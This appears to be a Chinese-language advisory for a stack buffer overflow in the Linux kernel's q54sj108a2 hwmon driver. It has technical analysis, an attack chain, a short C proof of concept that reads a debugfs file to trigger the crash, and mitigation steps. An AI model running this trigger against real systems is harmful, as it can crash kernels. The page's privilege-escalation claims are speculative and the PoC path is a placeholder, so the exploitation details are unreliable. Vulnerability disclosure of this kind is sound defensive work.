CVE-2026-43380 CVSS 7.8 高危

CVE-2026-43380 Linux内核栈溢出漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43380

漏洞类型

栈缓冲区溢出

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的hwmon驱动（pmbus/q54sj108a2）存在栈缓冲区溢出漏洞。该漏洞发生在q54sj108a2_debugfs_read函数中，原因是bin2hex()函数参数配置错误且目标缓冲区大小不足。当读取32字节数据时，bin2hex()生成64字节输出，但目标缓冲区仅有34字节，导致30字节的越界写入。此外，参数顺序颠倒导致逻辑错误。本地低权限攻击者可利用此漏洞导致内核崩溃或潜在的权限提升。

技术细节

该漏洞源于Linux内核drivers/hwmon/pmbus/q54sj108a2.c文件中的q54sj108a2_debugfs_read函数。函数在处理I2C设备读取请求时，使用了一个34字节的栈缓冲区'data'（定义为I2C_SMBUS_BLOCK_MAX + 2）。由于bin2hex()函数将二进制数据转换为十六进制字符串，每1字节输入产生2字节输出，当I2C读取返回32字节时，bin2hex()将尝试写入64字节数据。这导致30字节的数据写入超出'data'缓冲区的边界，造成栈溢出。此外，代码中bin2hex()的源参数和目标参数被错误地交换，导致从零初始化的data_char读取。攻击者可通过读取debugfs接口触发该溢出，利用栈上的布局破坏控制流或导致拒绝服务。

攻击链分析

STEP 1

1. 本地访问

攻击者需要在目标系统上拥有本地低权限用户访问权限。

STEP 2

2. 定位接口

攻击者识别并定位到/sys/kernel/debug/下q54sj108a2驱动生成的debugfs接口文件。

STEP 3

3. 触发溢出

攻击者调用read()系统调用读取该debugfs文件，触发q54sj108a2_debugfs_read函数。

STEP 4

4. 执行利用

由于bin2hex()导致栈缓冲区溢出，攻击者可能覆盖返回地址，实现本地代码执行或导致内核崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * PoC for CVE-2026-43380
 * Trigger: Read from the debugfs interface of the q54sj108a2 driver.
 * This triggers the stack buffer overflow in q54sj108a2_debugfs_read.
 */
int main() {
    // The actual path depends on the hardware instance and debugfs mount point
    const char *debugfs_file = "/sys/kernel/debug/hwmon/hwmonX/q54sj108a2_debugfs_read";
    
    int fd = open(debugfs_file, O_RDONLY);
    if (fd < 0) {
        perror("[-] Failed to open debugfs file");
        fprintf(stderr, "[-] Ensure the target hardware is present and debugfs is mounted.\n");
        return 1;
    }

    printf("[*] Triggering the vulnerability by reading from %s\n", debugfs_file);
    
    char buffer[128];
    ssize_t len = read(fd, buffer, sizeof(buffer));
    
    if (len > 0) {
        printf("[+] Read %zd bytes. Check kernel logs for panic or instability.\n", len);
    } else {
        perror("[-] Read failed");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel < 6.6 (具体受影响版本请参考Git提交记录)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁。在无法立即升级的情况下，可以通过卸载pmbus_q54sj108a2内核模块或使用mount命令将debugfs挂载为仅root可访问（mode 700）来缓解风险，防止非特权用户触发漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表